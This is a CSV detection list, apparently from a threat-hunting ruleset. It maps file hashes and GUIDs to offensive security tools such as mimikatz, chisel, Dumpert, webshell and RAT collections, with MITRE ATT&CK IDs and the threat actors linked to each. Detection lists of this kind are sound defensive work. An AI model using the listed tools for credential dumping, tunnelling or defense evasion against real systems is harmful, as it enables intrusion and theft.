"*9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a*",".{0,1000}9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31779"
"*9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234*",".{0,1000}9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","31781"
"*9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16*",".{0,1000}9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31782"
"*9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74*",".{0,1000}9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31783"
"*9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b*",".{0,1000}9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31784"
"*9b287794f93df5f5bf9dbc8133ed9f6c84c270b87812e6b9426c1aded5eda58b*",".{0,1000}9b287794f93df5f5bf9dbc8133ed9f6c84c270b87812e6b9426c1aded5eda58b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31785"
"*9b33e5ff2cc99df282013554ee5cc3a9a0fe737510af24717b48f93c5d66b94a*",".{0,1000}9b33e5ff2cc99df282013554ee5cc3a9a0fe737510af24717b48f93c5d66b94a.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31786"
"*9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b*",".{0,1000}9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","31787"
"*9b379b8478d9ec722c72d0eff669e132dc52c44e8d27bea832b6fbe6d4f00f11*",".{0,1000}9b379b8478d9ec722c72d0eff669e132dc52c44e8d27bea832b6fbe6d4f00f11.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31788"
"*9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a*",".{0,1000}9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31789"
"*9b432d28fab76406a94c7b59e20a71cd65d1bde26b41bcd6d31e02387e8e81cf*",".{0,1000}9b432d28fab76406a94c7b59e20a71cd65d1bde26b41bcd6d31e02387e8e81cf.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","31792"
"*9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e*",".{0,1000}9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31794"
"*9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e*",".{0,1000}9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31795"
"*9b4c57e7b68da80e3949caccaca1742dfdbe31be6f033096f8c9d72a7a0e7947*",".{0,1000}9b4c57e7b68da80e3949caccaca1742dfdbe31be6f033096f8c9d72a7a0e7947.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31796"
"*9b5609bdc5e1b30c20848a3268d4722d9e9befb7f1b620b1d2bf9b89a3429e93*",".{0,1000}9b5609bdc5e1b30c20848a3268d4722d9e9befb7f1b620b1d2bf9b89a3429e93.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31799"
"*9b58d53cfea14b281ec196a1989aedb62550857ad91273708da6cce760f51306*",".{0,1000}9b58d53cfea14b281ec196a1989aedb62550857ad91273708da6cce760f51306.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31800"
"*9b723acfd67b3a99b88251493db23b8af6fedc8e36395096acec7332f61b86ba*",".{0,1000}9b723acfd67b3a99b88251493db23b8af6fedc8e36395096acec7332f61b86ba.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","31806"
"*9b732d0af2afc8020a4d4416801e44366bf8793c2bd1e519254fbf31c3268065*",".{0,1000}9b732d0af2afc8020a4d4416801e44366bf8793c2bd1e519254fbf31c3268065.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31807"
"*9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5*",".{0,1000}9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31808"
"*9b7a6b25b1f242d4777bbda7ee34d1dab6d0cdcea708c6e0e2fa7ffb4cd9cf7b*",".{0,1000}9b7a6b25b1f242d4777bbda7ee34d1dab6d0cdcea708c6e0e2fa7ffb4cd9cf7b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31809"
"*9b7e4c777b2fed27f94d05d195c52bdc036482820274dfa345eb9bbd557d4ac7*",".{0,1000}9b7e4c777b2fed27f94d05d195c52bdc036482820274dfa345eb9bbd557d4ac7.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31810"
"*9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894*",".{0,1000}9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","31811"
"*9B823D93-BF1B-407B-A4CD-231347F656AD*",".{0,1000}9B823D93\-BF1B\-407B\-A4CD\-231347F656AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","31813"
"*9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551*",".{0,1000}9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31815"
"*9b897f1e3f2a174e48499a060b1017b67e8ea49991b6d3f673fadb96abae6273*",".{0,1000}9b897f1e3f2a174e48499a060b1017b67e8ea49991b6d3f673fadb96abae6273.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31817"
"*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*",".{0,1000}9b9850751be2515c8231e5189015bbe6\:49ef7638d69a01f26d96ed673bf50c45.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","#filehash","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","31819"
"*9ba444580d4d5eb6f4b020f68ee625a36b6c5b5210c128f148e4de929da0508d*",".{0,1000}9ba444580d4d5eb6f4b020f68ee625a36b6c5b5210c128f148e4de929da0508d.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31820"
"*9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235*",".{0,1000}9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31822"
"*9bb0c39f776edc0869cb86fd3de17fccfde02dffe82290dde30997ca10e864fb*",".{0,1000}9bb0c39f776edc0869cb86fd3de17fccfde02dffe82290dde30997ca10e864fb.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31824"
"*9bb557700cb82541b43da98c6d4eac110289b54736350ba7d4467ca783f950a7*",".{0,1000}9bb557700cb82541b43da98c6d4eac110289b54736350ba7d4467ca783f950a7.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","31825"
"*9bb578e34921df2349f86f8867986d15cd2ed3bc510feeb6feb318493e753855*",".{0,1000}9bb578e34921df2349f86f8867986d15cd2ed3bc510feeb6feb318493e753855.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31826"
"*9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684*",".{0,1000}9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","31830"
"*9bd15de627aa46533968e0f7fae19e8b855d0a40*",".{0,1000}9bd15de627aa46533968e0f7fae19e8b855d0a40.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","31832"
"*9bd65e7bdb3f403886a253cc9944ce4f460812ba9534ad4846b97fa13f6a81ee*",".{0,1000}9bd65e7bdb3f403886a253cc9944ce4f460812ba9534ad4846b97fa13f6a81ee.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31833"
"*9be156f2e68d672cc00a2e419484e13e6873ea230d83caba801f703fbbd02e64*",".{0,1000}9be156f2e68d672cc00a2e419484e13e6873ea230d83caba801f703fbbd02e64.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31835"
"*9be3e067a95db163c7789d87310be1ba8f55d0077768c5fd1c26fbc47c8808ad*",".{0,1000}9be3e067a95db163c7789d87310be1ba8f55d0077768c5fd1c26fbc47c8808ad.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31836"
"*9be91dca307ee31fb990f6697984a4a84a486a594f5937c3420a9cb765f63ddf*",".{0,1000}9be91dca307ee31fb990f6697984a4a84a486a594f5937c3420a9cb765f63ddf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31837"
"*9be92d43d374ae72fbc28b078e1083e674ebe4da30f4f815aa9d86150b4fe024*",".{0,1000}9be92d43d374ae72fbc28b078e1083e674ebe4da30f4f815aa9d86150b4fe024.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#filehash","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","31838"
"*9bfad1d826217983cbf0bb46c9578f592002d7893e0e359ef30f888c3693ad3c*",".{0,1000}9bfad1d826217983cbf0bb46c9578f592002d7893e0e359ef30f888c3693ad3c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","31840"
"*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*",".{0,1000}9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","31842"
"*9c00d3da7e3c0819680241d13b156c9724fa446295e7d39b204351d12c85759b*",".{0,1000}9c00d3da7e3c0819680241d13b156c9724fa446295e7d39b204351d12c85759b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31843"
"*9c03a993cb73874e6e4ecbdd9c8df8b657f4f45395ae342e9206e56d72224d7c*",".{0,1000}9c03a993cb73874e6e4ecbdd9c8df8b657f4f45395ae342e9206e56d72224d7c.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31844"
"*9c08b2701019c0b4860a85af161c64c303400d720c494aaeade5c2d0d2607118*",".{0,1000}9c08b2701019c0b4860a85af161c64c303400d720c494aaeade5c2d0d2607118.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","31845"
"*9c098d624b4fd2ce42067a75d0d5f37e6d580e5430ee68dea36d4325e424f1b4*",".{0,1000}9c098d624b4fd2ce42067a75d0d5f37e6d580e5430ee68dea36d4325e424f1b4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31846"
"*9c0a560217bcbdd543c9f90eff81b714f4ddcbea9be1bd69c4c348f251be9b88*",".{0,1000}9c0a560217bcbdd543c9f90eff81b714f4ddcbea9be1bd69c4c348f251be9b88.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31847"
"*9c131cb9b12e02680ef095d8066183ac8b97fd67b0631a69126a3e614c2ea707*",".{0,1000}9c131cb9b12e02680ef095d8066183ac8b97fd67b0631a69126a3e614c2ea707.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31849"
